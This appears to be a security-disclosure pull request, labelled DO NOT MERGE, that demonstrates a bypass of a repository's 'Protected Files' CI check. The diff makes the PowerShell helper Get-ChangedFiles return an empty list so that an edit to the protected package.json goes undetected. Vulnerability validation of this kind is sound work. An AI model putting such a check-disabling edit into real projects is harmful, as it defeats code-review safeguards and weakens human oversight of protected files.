### PR TITLE
MSRC security validation: Protected Files check bypass PoC - DO NOT MERGE

### DIFF
--- a/eng/scripts/ChangedFiles-Functions.ps1
+++ b/eng/scripts/ChangedFiles-Functions.ps1
@@ -1,4 +1,7 @@
 function Get-ChangedFiles($baseCommitish = "HEAD^", $headCommitish = "HEAD", $diffFilter = "d") {
+  # MSRC_SECURITY_POC_BYPASS_PROTECTED_FILES: intentionally hide changed files to validate
+  # that the Protected Files workflow trusts this helper from the PR checkout. DO NOT MERGE.
+  return @()
   # diff-filter=d is to exclude any deleted files as we don't generally 
   # want to do work against files that no longer exist.
   # https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203

--- a/package.json
+++ b/package.json
@@ -46,5 +46,6 @@
   "engines": {
     "node": ">=22.0.0"
   },
-  "private": true
+  "private": true,
+  "_msrc_security_poc_do_not_merge": "protected-files-check-bypass-validation"
 }


### PR DESCRIPTION
MSRC security validation PoC — DO NOT MERGE.

This PR intentionally modifies a protected file (`package.json`) and the helper used by the `Protected Files` workflow to validate whether the required check trusts code from the PR checkout.

Expected observation: `Protected Files` should pass even though a protected file was changed. This PR is for bounty validation only and should be closed after evidence is collected.